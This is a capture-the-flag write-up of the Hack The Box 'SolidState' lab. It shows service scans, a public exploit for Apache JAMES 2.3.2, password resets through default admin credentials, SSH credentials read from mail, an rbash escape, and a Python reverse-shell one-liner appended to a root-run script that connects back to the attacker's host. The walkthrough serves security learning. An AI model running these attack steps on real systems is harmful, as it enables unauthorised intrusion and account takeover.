Hack The Box : SolidState
31 July, 2021
Starting off with an nmap scan
# nmap -A -sC -sV -O -Pn 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.51
Host is up (0.40s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.174 [10.10.16.174]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/30%OT=22%CT=1%CU=37697%PV=Y%DS=2%DC=T%G=Y%TM=6103873
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=1
OS:05%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O
OS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 407.53 ms 10.10.16.1
2 203.89 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.27 seconds
I couldn't find anything interesting on any of the open ports. So I went searching on the internet using the above information and found out an exploit for Apache JAMES Server v2.3.2, an exact match! I looked at the code and it required port 4555 to be open. Since I didn't find it in the initial scan, I ran another to see if it was open and it indeed was
# nmap -A -sC -sV -O -Pn -p 4555 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-30 13:15 EDT
Nmap scan report for 10.10.10.51
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.91%I=7%D=7/30%Time=610433AB%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.8 - 3.11 (94%), Linux 4.8 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.18 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 4555/tcp)
HOP RTT ADDRESS
1 363.03 ms 10.10.16.1
2 196.62 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.92 seconds
Let's use the exploit.
# python2 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
The exploit used root:root as credentials so I used the same to connect to port 4555. The exploit was supposed to execute the payload when a user logged in so I had changed to payload to a curl command to request a file from my system but I could see that there was no such request.
# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
So I moved on to looking around the admin tool. I reset the password for each of the users.
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset
User
Going through the emails I found Mindy's SSH login credentials
# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS mindy
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
Using the credentials I was able to login and found the user flag
mindy@solidstate:~$ cat user.txt
<flag>
Root
As mindy I wasn't allowed to use the cd command
mindy@solidstate:~$ ls -ltrha
total 28K
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
-rw------- 1 root root 0 Aug 22 2017 .shosts
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw------- 1 mindy mindy 33 Nov 18 2020 user.txt
lrwxrwxrwx 1 root root 9 Nov 18 2020 .bash_history -> /dev/null
drwxr-x--- 2 mindy mindy 4.0K Apr 26 12:37 bin
drwxr-xr-x 4 root root 4.0K Apr 26 12:37 ..
drwxr-x--- 4 mindy mindy 4.0K Apr 26 12:37 .
drw------- 2 root root 4.0K Apr 26 12:37 .ssh
mindy@solidstate:~$ cd .ssh
-rbash: cd: restricted
The bin folder had three symbolic links
mindy@solidstate:~$ ls bin/
cat env ls
mindy@solidstate:~$ ls -ltrha bin/cat
lrwxrwxrwx 1 root root 8 Aug 22 2017 bin/cat -> /bin/cat
mindy@solidstate:~$ ls -ltrha bin/env
lrwxrwxrwx 1 root root 8 Aug 22 2017 bin/env -> /bin/env
mindy@solidstate:~$ ls -ltrha bin/ls
lrwxrwxrwx 1 root root 7 Aug 22 2017 bin/ls -> /bin/ls
mindy@solidstate:~$ bin/cat
-rbash: bin/cat: restricted: cannot specify `/' in command names
The $PATH was restricted to mindy's directory and I couldn't add / in the command names so I couldn't access anything beyond what was present in bin/
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
Searching around the internet, I found some techniques to escape restricted shells: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf. Using ssh's -t option I was able to bypass the restricted shell
# ssh mindy@10.10.10.51 -t "bash"
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $SHELL
/bin/rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd bin
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ ls
cat env ls
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ cd /tmp
I ran linpeas and saw an interesting line in the output
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py
``
Let's check out this python script
```bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -ltrha
total 16K
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
drwxr-xr-x 3 root root 4.0K Aug 22 2017 .
drwxr-xr-x 22 root root 4.0K Apr 26 12:37 ..
drwxr-xr-x 11 root root 4.0K Apr 26 12:37 james-2.3.2
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
I tried my luck and assumed this was being periodically run by root so adding a line to trigger a reverse shell would help escalate my privilege.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.174",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.51] 37060
root@solidstate:~# id
wid
huid=0(root) gid=0(root) groups=0(root)
root@solidstate:~# oami
whoami
root
root@solidstate:~# whoami
whoami
root
root@solidstate:~# cat /root/root.txt
cat /root/root.txt
It worked! Alternatively I could have confirmed if this screipt was being run as root using pspy